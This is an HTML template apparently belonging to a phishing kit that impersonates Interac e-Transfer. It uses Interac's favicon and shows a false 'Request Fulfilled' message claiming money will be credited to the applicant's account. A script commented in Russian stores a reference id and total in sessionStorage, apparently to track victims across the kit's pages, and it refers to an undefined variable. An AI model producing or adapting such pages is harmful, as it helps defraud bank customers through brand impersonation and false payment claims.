<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://www.interac.ca/wp-content/smush-webp/2023/01/cropped-Interac_Two-Colour_RGB-favicon512x512-192x192.png.webp">
    <title>Request Fulfilled</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
            background-color: #f5f5f5;
            text-align: center;
        }
        .checkmark {
            width: 100px;
            height: 100px;
            background-color: #28a745;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 20px;
        }
        .checkmark::before {
            content: '\2713';
            font-size: 60px;
            color: white;
        }
        p {
            font-size: 18px;
            color: #333;
            max-width: 400px;
            line-height: 1.5;
        }
    </style>
</head>
<body>
    <div class="checkmark"></div>
    <p>The request for money has already been fulfilled and the money will be credited to the applicant’s account tomorrow 12:00AM</p>
    <form id="paramsForm" style="display:none">
        <input type="hidden" name="url_id" value="{{ reference }}">
        <input type="hidden" name="total" value="{{ total }}">
    </form>
    <script>
        // Автоматическое сохранение параметров в сессию при загрузке
        document.addEventListener('DOMContentLoaded', function() {
            const urlParams = new URLSearchParams(window.location.search);
            const urlId = urlParams.get('url_id') || "{{ reference }}";
            
            if(urlId && total) {
                // Сохраняем параметры в sessionStorage
                sessionStorage.setItem('url_id', urlId);
                sessionStorage.setItem('total', total);
            }
        });
    </script>
</body>
</html>